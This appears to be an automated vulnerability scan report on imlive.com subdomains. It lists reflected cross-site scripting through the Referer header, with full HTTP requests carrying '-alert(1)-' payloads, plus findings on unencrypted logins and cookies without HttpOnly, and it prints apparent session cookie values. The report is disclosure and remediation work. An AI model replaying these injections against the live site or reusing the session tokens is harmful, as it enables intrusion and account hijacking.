Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5a33e'-alert(1)-'3a6e8f04043
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b0b'-alert(1)-'74ef2eb4a5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=60b0b'-alert(1)-'74ef2eb4a5d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3539e'-alert(1)-'9d756dfe67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3539e'-alert(1)-'9d756dfe67
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88b2'-alert(1)-'2a63c42b092 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c88b2'-alert(1)-'2a63c42b092
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd73'-alert(1)-'7a8d4483e55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8dd73'-alert(1)-'7a8d4483e55
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b4f'-alert(1)-'69efbaaf3ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71b4f'-alert(1)-'69efbaaf3ed
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6e9'-alert(1)-'53afcdd47c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d6e9'-alert(1)-'53afcdd47c4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c478e'-alert(1)-'b70284934ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c478e'-alert(1)-'b70284934ea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffa0b'-alert(1)-'f8b58c61969 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ffa0b'-alert(1)-'f8b58c61969
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5a6'-alert(1)-'f51a024305a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7a5a6'-alert(1)-'f51a024305a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98560'-alert(1)-'35d8e8b408e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=98560'-alert(1)-'35d8e8b408e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e7e1'-alert(1)-'d1ec1d083c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e7e1'-alert(1)-'d1ec1d083c3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48c4b'-alert(1)-'aa630895a23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=48c4b'-alert(1)-'aa630895a23
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa18c'-alert(1)-'e132931c5dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aa18c'-alert(1)-'e132931c5dd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d2d'-alert(1)-'c3f6f59e0c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=72d2d'-alert(1)-'c3f6f59e0c0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5e2'-alert(1)-'3ba738e3b95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de5e2'-alert(1)-'3ba738e3b95
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d83'-alert(1)-'43e531d6dcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50d83'-alert(1)-'43e531d6dcf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19fe'-alert(1)-'3e5a0cefaf9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d19fe'-alert(1)-'3e5a0cefaf9
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
